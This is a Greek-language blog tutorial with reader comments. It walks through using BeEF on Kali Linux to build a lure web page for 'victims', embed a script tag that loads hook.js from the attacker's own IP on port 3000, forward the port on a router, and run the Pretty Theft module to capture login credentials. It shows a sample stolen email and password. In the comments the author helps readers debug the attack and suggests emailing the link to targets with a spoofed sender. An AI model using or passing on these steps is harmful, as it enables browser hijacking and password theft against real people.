Τι θα χρεαστειτε;
1Κali linux
2.BeEF (Browser explotation Framework)
Γραφουμε σε ενα τερματικο beef-xss και θα μας ανοιξει την σελιδα του beef
η πηγαινουμε Explotation Tools και επιλεγουμε το Beef
username:beef
password:beef
οταν τα βαλουμε θα μας παει στο menu του beef
τωρα πηγαινουμε εδω κανουμε εγραφη και επιλεγουμε new hosting
τωρα γραφουμε το ονομα που θελουμε να εχει η σελιδα μας βαζουμε ενα κωδικο και επιλεγουμε συνεχεια *επιλεξτε hol.es και οχι esy.es*
γραφουμε οτι captcha μας εμφανισει και επιλεγουμε παραγγελια
επιλεγουμε την σελιδα και κατασκευαστης ιστοσελιδων
θα μας εμφανισει καποιο απο τα προτυπα πχ
*εσεις διαλεγετε οποιο θελετε και αναλογα ποιο πιστευετε οτι θα τραβηξει τα θυματα σας
πχ εγω επελεξα αυτο
τωρα πρεπει να βαλετε το μυαλο σας να δουλεψει και να κατασκευασετε η να γραψετε στην σελιδα κατι που να κρατησει τα θυματα σας να διαβασουνε αυτο που θα γραψετε πχ κοιταξτε πως εφτιαξα εγω την σελιδα περιπου για να μπειτε στο νοημα
οταν τελειωσετε απλα σερνετε το καρτελακι html πχ
πατατε διπλο κλικ η επιλεγετε το μολυβακι και γραφετε
<script type=text/javascript src=http://ΧΧ.ΧΧ.ΧΧ.ΧΧ:3000/hook.js></script>
οπου χχ.χχ.χχ.χχ βαζετε την εξωτερικη σας ip για να δειτε ποια ειναι πατηστε εδω
επιλεγουμε εφαρμογη
μετα επιλεγουμε οπως την εικονα κατω και αποθηκευουμε
πχ κοιταξτε ολοκληρωνενη την σελιδα δολος που εφτιαξα
τωρα πηγαινουμε στη σελιδα του ρουτερ μας πχ (192.168.1.1 η 192.168.1.254)
και προωθουμε την θυρα 3000 στην ip μας (εσωτερικη του υπολογιστη μας) *αν γραψετε σε ενα τερματικο ifconfig θα δειτε ποια ειναι η εσωτερικη ip σας πχ στο ρουτερ θα πρεπει να βαλετε κατι τετοιο
μετα για να δειτε οτι οντως ειναι ανοικτη η θυρα πατηστε εδω
και θα δειτε οτι ειναι ενταξει
οταν το θυμα κοιταξει την σελιδα μας....θα διαβαζει το αρθρο
εμεις τοτε θα δουμε ενα zombie δλδ ενωμενο χρηστη
πχ
τωρα επιλεγουμε το θυμα(zombie) και βλεπουμε διαφορες πληροφοριες
μετα επιλεγουμε commands -Social Engineering-Prety thieft και execute
στο θυμα μας θα του εμφανιστει αυτο
οταν βαλει τον κωδικο του τοτε
θα μας εμφανισει τα αποτελεσματα
δλδ nickthesail0r@fetamail.com και κωδικος xazos56
Πως θα προστατευτειτε;
Απλα ποτε μην βαζετε τον κωδικο σας εκτος facebook
6 σχόλια:
Γεια σου Nick έχω ένα πρόβλημα και το έχω προσπαθήσει πάρα πολλές φόρες και δεν κατάφερα τίποτα..Λοιπόν τα έχω κάνει όλα όσα λες όλα μια χαρά άπλα στο Beef δεν μου βγάζει τίποτα όταν μπαίνει κάποιος.. ενώ τα υπόλοιπα τα έχω κάνει ακριβώς έτσι όπως τα έκανες εσύ..
κοιτα στο beef εκει που λεει demo hook page.αν πατησεις εκει θα δεις οτι εχεις zombie εσενα.αν δεν σου εμφανιζει κατι τοτε κατι εκανες λαθος.αν σου εμφανιζει τοτε προωθησε την θυρα 3000 στην τοπικη ip σου δλδ 192.168.χ.χ και στο <script type κτλ θα βαλεις την εξωτερικη σου ip τη οποια θα την βρεις πχ www.whatismyip.com η στις ρυθμισεις του ρουτερ σου.
Το έχω κάνει στο τοπικό δίκτυο και δουλεύει μια χαρά..ενώ όταν βάζω την εξωτερική ip και ανοίγω το πορτ και το τεστάρω κανονικά και μου λέει ότι είναι ανοικτό.. όταν όμως πάω να μπω στην σελίδα μου δεν μου βγάζει ότι υπάρχει ενωμένος χρήστης.. Δεν μπορώ να καταλάβω τη φταίει..
κατι γινεται με την προωθηση θυρας σου εφοσον σου δουλευει σε τοπικο...σιγουρα βαζεις την εξωτερικη σου ip οταν την στελνεις? http://127.0.0.1:3000/demos/basic.html σε αυτο το link θα αντικαταστησεις το 127.0.0.1 με την εξωτερικη σου ip.εφου εχεις ξεκινησει το beef
Καλημερα Νικο θελω την βοηθεια σου σε παρακαλω πολυ. Θελω να μου πεις πως στελνω με e-mail την σελιδα που εφτιαξα γιατι δεν θελω να την ανεβασω μπορεις να μου πεις με ποιον τροπο γινετε αυτο σε παρακαλω πολυ. Σε ευχαριστω πολυ.
απλα στελνεις το email και βαζεις τον συνδεσμο στο κειμενο.βεβαια αν θες μπορεις να κοιταξεις σε ενα παλιοτερο οδηγο μου που στελνεις email και βαζεις οτι θες για αποστολεα.αν θυμαμαι καλα λεγεται "καντε πλακα σε φιλους και γνωστους στελνωντας του email"
αν θες να επικοινωνεις αμεσα υπαρχει σελιδα www.facebook.com/nickthesail0r.gr
Δημοσίευση σχολίου